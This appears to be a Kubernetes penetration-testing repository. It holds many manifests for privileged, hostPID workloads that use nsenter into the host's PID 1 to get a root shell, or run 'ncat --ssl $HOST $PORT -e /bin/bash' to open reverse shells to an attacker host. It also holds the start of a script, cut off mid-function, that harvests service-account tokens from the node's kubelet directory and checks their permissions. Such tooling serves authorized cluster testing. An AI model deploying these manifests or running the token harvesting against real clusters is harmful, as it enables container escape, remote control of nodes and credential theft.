/manifests/priv-and-hostpid/deamonset/priv-and-hostpid-exec-deamonset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: DaemonSet 3 | metadata: 4 | name: priv-and-hostpid-exec-daemonset 5 | labels: 6 | app: pentest 7 | type: daemonset 8 | spec: 9 | selector: 10 | matchLabels: 11 | app: pentest 12 | type: daemonset 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: daemonset 18 | spec: 19 | hostPID: true 20 | containers: 21 | - name: priv-and-hostpid-exec-daemonset 22 | image: ubuntu 23 | tty: true 24 | securityContext: 25 | privileged: true 26 | command: [ "nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "bash" ] 27 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name -------------------------------------------------------------------------------- /manifests/priv-and-hostpid/deamonset/priv-and-hostpid-revshell-deamonset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: DaemonSet 3 | metadata: 4 | name: priv-and-hostpid-revshell-daemonset 5 | labels: 6 | app: pentest 7 | type: daemonset 8 | spec: 9 | selector: 10 | matchLabels: 11 | app: pentest 12 | type: daemonset 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: daemonset 18 | spec: 19 | hostPID: true 20 | containers: 21 | - name: priv-and-hostpid-revshell-daemonset 22 | image: raesene/ncat 23 | securityContext: 24 | privileged: true 25 | command: [ "/usr/local/bin/ncat", "--ssl", "$HOST", "$PORT", "-e", "/bin/nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "/bin/bash"] 26 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name -------------------------------------------------------------------------------- /manifests/priv-and-hostpid/deployment/priv-and-hostpid-exec-deployment.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: Deployment 3 | metadata: 4 | name: priv-and-hostpid-exec-deployment 5 | labels: 6 | app: pentest 7 | type: deployment 8 | spec: 9 | replicas: 2 10 | selector: 11 | matchLabels: 12 | app: pentest 13 | type: deployment 14 | template: 15 | metadata: 16 | labels: 17 | app: pentest 18 | type: deployment 19 | spec: 20 | hostPID: true 21 | containers: 22 | - name: priv-and-hostpid-exec-deployment 23 | image: ubuntu 24 | tty: true 25 | securityContext: 26 | privileged: true 27 | command: [ "nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "bash" ] 28 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name -------------------------------------------------------------------------------- /manifests/priv-and-hostpid/deployment/priv-and-hostpid-revshell-deployment.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: Deployment 3 | metadata: 4 | name: priv-and-hostpid-revshell-deployment 5 | labels: 6 | app: pentest 7 | type: deployment 8 | spec: 9 | replicas: 2 10 | selector: 11 | matchLabels: 12 | app: pentest 13 | type: deployment 14 | template: 15 | metadata: 16 | labels: 17 | app: pentest 18 | type: deployment 19 | spec: 20 | hostPID: true 21 | containers: 22 | - name: priv-and-hostpid-revshell-deployment 23 | image: raesene/ncat 24 | securityContext: 25 | privileged: true 26 | command: [ "/usr/local/bin/ncat", "--ssl", "$HOST", "$PORT", "-e", "/bin/nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "/bin/bash"] 27 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name -------------------------------------------------------------------------------- /manifests/priv-and-hostpid/job/priv-and-hostpid-exec-job.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: batch/v1 2 | kind: Job 3 | metadata: 4 | name: priv-and-hostpid-exec-job 5 | labels: 6 | app: pentest 7 | type: job 8 | spec: 9 | template: 10 | spec: 11 | hostPID: true 12 | containers: 13 | - name: priv-and-hostpid-exec-job 14 | image: ubuntu 15 | tty: true 16 | securityContext: 17 | privileged: true 18 | command: [ "nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "bash" ] 19 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 20 | restartPolicy: OnFailure 21 | 22 | -------------------------------------------------------------------------------- /manifests/priv-and-hostpid/job/priv-and-hostpid-revshell-job.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: batch/v1 2 | kind: Job 3 | metadata: 4 | name: priv-and-hostpid-revshell-job 5 | labels: 6 | app: pentest 7 | type: job 8 | spec: 9 | template: 10 | spec: 11 | hostPID: true 12 | containers: 13 | - name: priv-and-hostpid-revshell-job 14 | image: raesene/ncat 15 | securityContext: 16 | privileged: true 17 | command: [ "/usr/local/bin/ncat", "--ssl", "$HOST", "$PORT", "-e", "/bin/nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "/bin/bash"] 18 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 19 | restartPolicy: OnFailure 20 | 21 | -------------------------------------------------------------------------------- /manifests/priv-and-hostpid/pod/priv-and-hostpid-exec-pod.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Pod 3 | metadata: 4 | name: priv-and-hostpid-exec-pod 5 | labels: 6 | app: pentest 7 | spec: 8 | hostPID: true 9 | containers: 10 | - name: priv-and-hostpid-pod 11 | image: ubuntu 12 | tty: true 13 | securityContext: 14 | privileged: true 15 | command: [ "nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "bash" ] 16 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name -------------------------------------------------------------------------------- /manifests/priv-and-hostpid/pod/priv-and-hostpid-revshell-pod.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Pod 3 | metadata: 4 | name: priv-and-hostpid-revshell-pod 5 | labels: 6 | app: pentest 7 | spec: 8 | hostPID: true 9 | containers: 10 | - name: priv-and-hostpid-pod 11 | image: raesene/ncat 12 | securityContext: 13 | privileged: true 14 | command: [ "/usr/local/bin/ncat", "--ssl", "$HOST", "$PORT", "-e", "/bin/nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "/bin/bash"] 15 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 16 | -------------------------------------------------------------------------------- /manifests/priv-and-hostpid/replicaset/priv-and-hostpid-exec-replicaset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: ReplicaSet 3 | metadata: 4 | name: priv-and-hostpid-exec-replicaset 5 | labels: 6 | app: pentest 7 | type: replicaset 8 | spec: 9 | replicas: 2 10 | selector: 11 | matchLabels: 12 | type: replicaset 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: replicaset 18 | spec: 19 | hostPID: true 20 | containers: 21 | - name: priv-and-hostpid-exec-replicaset 22 | image: ubuntu 23 | tty: true 24 | securityContext: 25 | privileged: true 26 | command: [ "nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "bash" ] 27 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name -------------------------------------------------------------------------------- /manifests/priv-and-hostpid/replicaset/priv-and-hostpid-revshell-replicaset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: ReplicaSet 3 | metadata: 4 | name: priv-and-hostpid-revshell-replicaset 5 | labels: 6 | app: pentest 7 | type: replicaset 8 | spec: 9 | replicas: 2 10 | selector: 11 | matchLabels: 12 | type: replicaset 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: replicaset 18 | spec: 19 | hostPID: true 20 | containers: 21 | - name: priv-and-hostpid-revshell-replicaset 22 | image: raesene/ncat 23 | securityContext: 24 | privileged: true 25 | command: [ "/usr/local/bin/ncat", "--ssl", "$HOST", "$PORT", "-e", "/bin/nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "/bin/bash"] 26 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name -------------------------------------------------------------------------------- /manifests/priv-and-hostpid/replicationcontroller/priv-and-hostpid-exec-replicationcontroller.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: ReplicationController 3 | metadata: 4 | name: priv-and-hostpid-exec-replicationcontroller 5 | labels: 6 | app: pentest 7 | type: replicationcontroller 8 | spec: 9 | replicas: 2 10 | selector: 11 | app: pentest 12 | type: replicationcontroller 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: replicationcontroller 18 | spec: 19 | hostPID: true 20 | containers: 21 | - name: priv-and-hostpid-exec-replicationcontroller 22 | image: ubuntu 23 | tty: true 24 | securityContext: 25 | privileged: true 26 | command: [ "nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "bash" ] 27 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name -------------------------------------------------------------------------------- /manifests/priv-and-hostpid/replicationcontroller/priv-and-hostpid-revshell-replicationcontroller.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: ReplicationController 3 | metadata: 4 | name: priv-and-hostpid-revshell-replicationcontroller 5 | labels: 6 | app: pentest 7 | type: replicationcontroller 8 | spec: 9 | replicas: 2 10 | selector: 11 | app: pentest 12 | type: replicationcontroller 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: replicationcontroller 18 | spec: 19 | hostPID: true 20 | containers: 21 | - name: priv-and-hostpid-revshell-replicationcontroller 22 | image: raesene/ncat 23 | securityContext: 24 | privileged: true 25 | command: [ "/usr/local/bin/ncat", "--ssl", "$HOST", "$PORT", "-e", "/bin/nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "/bin/bash"] 26 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 27 | -------------------------------------------------------------------------------- /manifests/priv-and-hostpid/statefulset/priv-and-hostpid-exec-statefulset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Service 3 | metadata: 4 | name: priv-and-hostpid-exec-statefulset-service 5 | labels: 6 | app: pentest 7 | spec: 8 | ports: 9 | - port: 4444 10 | name: priv-and-hostpid-exec-statefulset-service 11 | clusterIP: None 12 | selector: 13 | app: pentest 14 | --- 15 | apiVersion: apps/v1 16 | kind: StatefulSet 17 | metadata: 18 | name: priv-and-hostpid-exec-statefulset 19 | labels: 20 | app: pentest 21 | type: statefulset 22 | spec: 23 | serviceName: "pentest" 24 | replicas: 2 25 | selector: 26 | matchLabels: 27 | app: pentest 28 | type: statefulset 29 | template: 30 | metadata: 31 | labels: 32 | app: pentest 33 | type: statefulset 34 | spec: 35 | hostPID: true 36 | containers: 37 | - name: priv-and-hostpid-exec-statefulset 38 | image: ubuntu 39 | tty: true 40 | securityContext: 41 | privileged: true 42 | command: [ "nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "bash" ] 43 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 44 | -------------------------------------------------------------------------------- /manifests/priv-and-hostpid/statefulset/priv-and-hostpid-revshell-statefulset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Service 3 | metadata: 4 | name: priv-and-hostpid-revshell-statefulset-service 5 | labels: 6 | app: pentest 7 | spec: 8 | ports: 9 | - port: 4444 10 | name: priv-and-hostpid-revshell-statefulset-service 11 | clusterIP: None 12 | selector: 13 | app: pentest 14 | --- 15 | apiVersion: apps/v1 16 | kind: StatefulSet 17 | metadata: 18 | name: priv-and-hostpid-revshell-statefulset 19 | labels: 20 | app: pentest 21 | type: statefulset 22 | spec: 23 | serviceName: "pentest" 24 | replicas: 2 25 | selector: 26 | matchLabels: 27 | app: pentest 28 | type: statefulset 29 | template: 30 | metadata: 31 | labels: 32 | app: pentest 33 | type: statefulset 34 | spec: 35 | hostPID: true 36 | containers: 37 | - name: priv-and-hostpid-revshell-statefulset 38 | image: raesene/ncat 39 | securityContext: 40 | privileged: true 41 | command: [ "/usr/local/bin/ncat", "--ssl", "$HOST", "$PORT", "-e", "/bin/nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "/bin/bash"] 42 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 43 | -------------------------------------------------------------------------------- /manifests/priv/cronjob/priv-exec-cronjob.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: batch/v1beta1 2 | kind: CronJob 3 | metadata: 4 | name: priv-exec-cronjob 5 | labels: 6 | app: pentest 7 | spec: 8 | schedule: "*/1 * * * *" 9 | concurrencyPolicy: Forbid 10 | jobTemplate: 11 | spec: 12 | template: 13 | spec: 14 | containers: 15 | - name: priv-exec-cronjob 16 | image: ubuntu 17 | securityContext: 18 | privileged: true 19 | command: [ "/bin/sh", "-c", "--" ] 20 | args: [ "while true; do sleep 30; done;" ] 21 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 22 | restartPolicy: OnFailure 23 | -------------------------------------------------------------------------------- /manifests/priv/cronjob/priv-revshell-cronjob.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: batch/v1beta1 2 | kind: CronJob 3 | metadata: 4 | name: priv-revshell-cronjob 5 | labels: 6 | app: pentest 7 | spec: 8 | schedule: "*/1 * * * *" 9 | concurrencyPolicy: Forbid 10 | jobTemplate: 11 | spec: 12 | template: 13 | spec: 14 | containers: 15 | - name: priv-revshell-cronjob 16 | image: raesene/ncat 17 | securityContext: 18 | privileged: true 19 | command: [ "/bin/sh", "-c", "--" ] 20 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 21 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 22 | restartPolicy: OnFailure 23 | -------------------------------------------------------------------------------- /manifests/priv/deamonset/priv-exec-deamonset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: DaemonSet 3 | metadata: 4 | name: priv-exec-daemonset 5 | labels: 6 | app: pentest 7 | type: daemonset 8 | spec: 9 | selector: 10 | matchLabels: 11 | app: pentest 12 | type: daemonset 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: daemonset 18 | spec: 19 | containers: 20 | - name: priv-exec-daemonset 21 | image: ubuntu 22 | securityContext: 23 | privileged: true 24 | command: [ "/bin/sh", "-c", "--" ] 25 | args: [ "while true; do sleep 30; done;" ] 26 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 27 | -------------------------------------------------------------------------------- /manifests/priv/deamonset/priv-revshell-deamonset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: DaemonSet 3 | metadata: 4 | name: priv-revshell-daemonset 5 | labels: 6 | app: pentest 7 | type: daemonset 8 | spec: 9 | selector: 10 | matchLabels: 11 | app: pentest 12 | type: daemonset 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: daemonset 18 | spec: 19 | containers: 20 | - name: priv-revshell-daemonset 21 | image: raesene/ncat 22 | securityContext: 23 | privileged: true 24 | command: [ "/bin/sh", "-c", "--" ] 25 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 26 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 27 | -------------------------------------------------------------------------------- /manifests/priv/deployment/priv-exec-deployment.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: Deployment 3 | metadata: 4 | name: priv-exec-deployment 5 | labels: 6 | app: pentest 7 | type: deployment 8 | spec: 9 | replicas: 2 10 | selector: 11 | matchLabels: 12 | app: pentest 13 | type: deployment 14 | template: 15 | metadata: 16 | labels: 17 | app: pentest 18 | type: deployment 19 | spec: 20 | containers: 21 | - name: priv-exec-deployment 22 | image: ubuntu 23 | securityContext: 24 | privileged: true 25 | command: [ "/bin/sh", "-c", "--" ] 26 | args: [ "while true; do sleep 30; done;" ] 27 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 28 | -------------------------------------------------------------------------------- /manifests/priv/deployment/priv-revshell-deployment.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: Deployment 3 | metadata: 4 | name: priv-revshell-deployment 5 | labels: 6 | app: pentest 7 | type: deployment 8 | spec: 9 | replicas: 2 10 | selector: 11 | matchLabels: 12 | app: pentest 13 | type: deployment 14 | template: 15 | metadata: 16 | labels: 17 | app: pentest 18 | type: deployment 19 | spec: 20 | containers: 21 | - name: priv-revshell-deployment 22 | image: raesene/ncat 23 | securityContext: 24 | privileged: true 25 | command: [ "/bin/sh", "-c", "--" ] 26 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 27 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 28 | -------------------------------------------------------------------------------- /manifests/priv/job/priv-exec-job.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: batch/v1 2 | kind: Job 3 | metadata: 4 | name: priv-exec-job 5 | labels: 6 | app: pentest 7 | type: job 8 | spec: 9 | template: 10 | spec: 11 | containers: 12 | - name: priv-exec-job 13 | image: ubuntu 14 | securityContext: 15 | privileged: true 16 | command: [ "/bin/sh", "-c", "--" ] 17 | args: [ "while true; do sleep 30; done;" ] 18 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 19 | restartPolicy: OnFailure 20 | -------------------------------------------------------------------------------- /manifests/priv/job/priv-revshell-job.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: batch/v1 2 | kind: Job 3 | metadata: 4 | name: priv-revshell-job 5 | labels: 6 | app: pentest 7 | type: job 8 | spec: 9 | template: 10 | spec: 11 | containers: 12 | - name: priv-revshell-job 13 | image: raesene/ncat 14 | securityContext: 15 | privileged: true 16 | command: [ "/bin/sh", "-c", "--" ] 17 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 18 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 19 | restartPolicy: OnFailure 20 | -------------------------------------------------------------------------------- /manifests/priv/pod/priv-exec-pod.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Pod 3 | metadata: 4 | name: priv-exec-pod 5 | labels: 6 | app: pentest 7 | spec: 8 | containers: 9 | - name: priv-pod 10 | image: ubuntu 11 | securityContext: 12 | privileged: true 13 | command: [ "/bin/sh", "-c", "--" ] 14 | args: [ "while true; do sleep 30; done;" ] 15 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name -------------------------------------------------------------------------------- /manifests/priv/pod/priv-revshell-pod.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Pod 3 | metadata: 4 | name: priv-revshell-pod 5 | labels: 6 | app: pentest 7 | spec: 8 | containers: 9 | - name: priv-pod 10 | image: raesene/ncat 11 | securityContext: 12 | privileged: true 13 | command: [ "/bin/sh", "-c", "--" ] 14 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 15 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 16 | -------------------------------------------------------------------------------- /manifests/priv/replicaset/priv-exec-replicaset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: ReplicaSet 3 | metadata: 4 | name: priv-exec-replicaset 5 | labels: 6 | app: pentest 7 | type: replicaset 8 | spec: 9 | replicas: 2 10 | selector: 11 | matchLabels: 12 | type: replicaset 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: replicaset 18 | spec: 19 | containers: 20 | - name: priv-exec-replicaset 21 | image: ubuntu 22 | securityContext: 23 | privileged: true 24 | command: [ "/bin/sh", "-c", "--" ] 25 | args: [ "while true; do sleep 30; done;" ] 26 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 27 | -------------------------------------------------------------------------------- /manifests/priv/replicaset/priv-revshell-replicaset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: ReplicaSet 3 | metadata: 4 | name: priv-revshell-replicaset 5 | labels: 6 | app: pentest 7 | type: replicaset 8 | spec: 9 | replicas: 2 10 | selector: 11 | matchLabels: 12 | type: replicaset 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: replicaset 18 | spec: 19 | containers: 20 | - name: priv-revshell-replicaset 21 | image: raesene/ncat 22 | securityContext: 23 | privileged: true 24 | command: [ "/bin/sh", "-c", "--" ] 25 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 26 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 27 | -------------------------------------------------------------------------------- /manifests/priv/replicationcontroller/priv-exec-replicationcontroller.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: ReplicationController 3 | metadata: 4 | name: priv-exec-replicationcontroller 5 | labels: 6 | app: pentest 7 | type: replicationcontroller 8 | spec: 9 | replicas: 2 10 | selector: 11 | app: pentest 12 | type: replicationcontroller 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: replicationcontroller 18 | spec: 19 | containers: 20 | - name: priv-exec-replicationcontroller 21 | image: ubuntu 22 | securityContext: 23 | privileged: true 24 | command: [ "/bin/sh", "-c", "--" ] 25 | args: [ "while true; do sleep 30; done;" ] 26 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 27 | -------------------------------------------------------------------------------- /manifests/priv/replicationcontroller/priv-revshell-replicationcontroller.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: ReplicationController 3 | metadata: 4 | name: priv-revshell-replicationcontroller 5 | labels: 6 | app: pentest 7 | type: replicationcontroller 8 | spec: 9 | replicas: 2 10 | selector: 11 | app: pentest 12 | type: replicationcontroller 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: replicationcontroller 18 | spec: 19 | containers: 20 | - name: priv-revshell-replicationcontroller 21 | image: raesene/ncat 22 | securityContext: 23 | privileged: true 24 | command: [ "/bin/sh", "-c", "--" ] 25 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 26 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 27 | -------------------------------------------------------------------------------- /manifests/priv/statefulset/priv-exec-statefulset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Service 3 | metadata: 4 | name: priv-exec-statefulset-service 5 | labels: 6 | app: pentest 7 | spec: 8 | ports: 9 | - port: 4444 10 | name: priv-exec-statefulset-service 11 | clusterIP: None 12 | selector: 13 | app: pentest 14 | --- 15 | apiVersion: apps/v1 16 | kind: StatefulSet 17 | metadata: 18 | name: priv-exec-statefulset 19 | labels: 20 | app: pentest 21 | type: statefulset 22 | spec: 23 | serviceName: "pentest" 24 | replicas: 2 25 | selector: 26 | matchLabels: 27 | app: pentest 28 | type: statefulset 29 | template: 30 | metadata: 31 | labels: 32 | app: pentest 33 | type: statefulset 34 | spec: 35 | containers: 36 | - name: priv-exec-statefulset 37 | image: ubuntu 38 | securityContext: 39 | privileged: true 40 | command: [ "/bin/sh", "-c", "--" ] 41 | args: [ "while true; do sleep 30; done;" ] 42 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 43 | -------------------------------------------------------------------------------- /manifests/priv/statefulset/priv-revshell-statefulset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Service 3 | metadata: 4 | name: priv-revshell-statefulset-service 5 | labels: 6 | app: pentest 7 | spec: 8 | ports: 9 | - port: 4444 10 | name: priv-revshell-statefulset-service 11 | clusterIP: None 12 | selector: 13 | app: pentest 14 | --- 15 | apiVersion: apps/v1 16 | kind: StatefulSet 17 | metadata: 18 | name: priv-revshell-statefulset 19 | labels: 20 | app: pentest 21 | type: statefulset 22 | spec: 23 | serviceName: "pentest" 24 | replicas: 2 25 | selector: 26 | matchLabels: 27 | app: pentest 28 | type: statefulset 29 | template: 30 | metadata: 31 | labels: 32 | app: pentest 33 | type: statefulset 34 | spec: 35 | containers: 36 | - name: priv-revshell-statefulset 37 | image: raesene/ncat 38 | securityContext: 39 | privileged: true 40 | command: [ "/bin/sh", "-c", "--" ] 41 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 42 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 43 | -------------------------------------------------------------------------------- /scripts/can-they.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | ############################################################################### 3 | # Purpose: 4 | # 5 | # This script will find the token/secret for each pod running on the node and 6 | # tell you what each token is authorized to do. It can be run from within a pod 7 | # that has the host's filesystem mounted to /host, or from outside the pod. 8 | # 9 | # Usage: 10 | # 11 | # *** For execution INSIDE a pod with the host's filesystem mounted to /host *** 12 | # 13 | # This mode is best for: 14 | # - everything-allowed 15 | # - hostPath 16 | # 17 | # Copy the can-they.sh helper script to the pod, download it from github, or manually created it 18 | # kubectl cp scripts/can-they.sh podname:/ 19 | # 20 | # Exec into pod (Don't chroot) 21 | # kubectl exec -it pod-name -- bash 22 | # 23 | # Run can-they.sh 24 | # ./can-they.sh "-i --list" 25 | # ./can-they.sh "-i --list -n kube-system" 26 | # ./can-they.sh "-i --list -n default" 27 | # ./can-they.sh "-i list secrets -n kube-system" 28 | # ./can-they.sh "-i create pods -n kube-system" 29 | # ./can-they.sh "-i create clusterrolebindings" 30 | # 31 | # 32 | # *** For execution OUTSIDE a pod *** 33 | # 34 | # This mode is best for: 35 | # - priv-and-hostpid 36 | # 37 | # Run can-they.sh 38 | # ./can-they.sh -n NAMESPACE -p POD_NAME -i "OPTIONS" 39 | # ./can-they.sh -n development -p priv-and-hostpid-exec-pod -i "list secrets -n kube-system" 40 | # ./can-they.sh -n development -p priv-and-hostpid-exec-pod -i "--list" 41 | # ./can-they.sh -n development -p priv-and-hostpid-exec-pod -i "-n kube-system" 42 | # ./can-they.sh -n development -p priv-and-hostpid-exec-pod -i "get secrets -n kube-system" 43 | # 44 | ############################################################################### 45 | function check-can-exec-pod { 46 | check=$(kubectl auth can-i create pods/exec -n $namespace) 47 | #echo $check 48 | if [[ $check == "no" ]]; then 49 | echo "Are you sure you have access to exec into $pod in the $namespace namespace?" 50 | exit 1 51 | fi 52 | } 53 | 54 | function run-outside-pod { 55 | # Get the filenames that contain tokens from the mounted host directory 56 | tokens=`kubectl exec -it $pod -n $namespace -- find /host/var/lib/kubelet/pods/ -name token -type l 2>/dev/null` 57 | 58 | # Backup plan in case you are chrooted or running on host 59 | if [ $? -eq 1 ]; then 60 | tokens=`kubectl exec -it $pod -n $namespace -- find /var/lib/kubelet/pods/ -name token -type l` 61 | fi 62 | #tokens=`kubectl exec -it $pod -n $namespace -- find /var/lib/kubelet/pods/ -name token -type l` 63 | for filename in $tokens; do 64 | filename_clean=`echo $filename | tr -dc '[[:print:]]'` 65 | echo "--------------------------------------------------------" 66 | echo "Token Location: $filename_clean" 67 | tokena=`kubectl exec -it $pod -n $namespace -- cat $filename_clean` 68 | echo -n "Can I $user_input? " 69 | SERVER=`kubectl config view --minify --flatten -ojsonpath='{.clusters[].cluster.server}'` 70 | export KUBECONFIG="dummy" 71 | #echo "kubectl --server=$SERVER --insecure-skip-tls-verify --token=$tokena auth can-i $user_input" 72 | echo 73 | kubectl --server=$SERVER --insecure-skip-tls-verify --token=$tokena auth can-i $user_input 2> /dev/null; echo; \ 74 | unset KUBECONFIG 75 | done 76 | } 77 | 78 | function am-i-inside-pod-check { 79 | echo $KUBERNETES_SERVICE_HOST 80 | if [[ -z $KUBERNETES_SERVICE_HOST ]]; then 81 | echo "It does not appear you are in a Kubernetes pod?" 82 | echo 83 | usage 84 | fi 85 | } 86 | 87 | function run-inside-pod { 88 | if [ ! -f "/usr/local/bin/kubectl" ]; then 89 | apt update && apt -y install curl 90 | #Download and install kubectl into pod 91 | curl -LO "https://storage.googleapis.com/kubernetes-release/release/$(curl -s https://storage.googleapis.com/kubernetes-release/release/stable.txt)/bin/linux/amd64/kubectl" 92 | chmod +x ./kubectl 93 | mv ./kubectl /usr/local/bin/kubectl 94 | fi 95 | 96 | # Get the filenames that contain tokens from the mounted host directory 97 | tokens=`find /host/var/lib/kubelet/pods/ -name token -type l` 98 | # Backup plan in case you are chrooted or running on host 99 | if [ $? -eq 1 ]; then 100 | tokens=`find /var/lib/kubelet/pods/ -name token -type l` 101 | fi 102 | #For each token, print the token location and run `kubectl auth can-i list` using each token via the `--token` command line argument. 103 | for filename in $tokens; do 104 | filename_clean=`echo $filename | tr -dc '[[:print:]]'` 105 | echo "--------------------------------------------------------" 106 | echo "Token Location: $filename_clean" 107 | tokena=`cat $filename_clean` 108 | echo -n "Can I $user_input? " 109 | kubectl --token=$tokena auth can-i $user_input 110 | echo 111 | done 112 | } 113 | 114 | function usage { 115 | echo "Usage: " 116 | echo 117 | echo " [From outside a pod]: $0 -p podname -n namespace [-i \"VERB 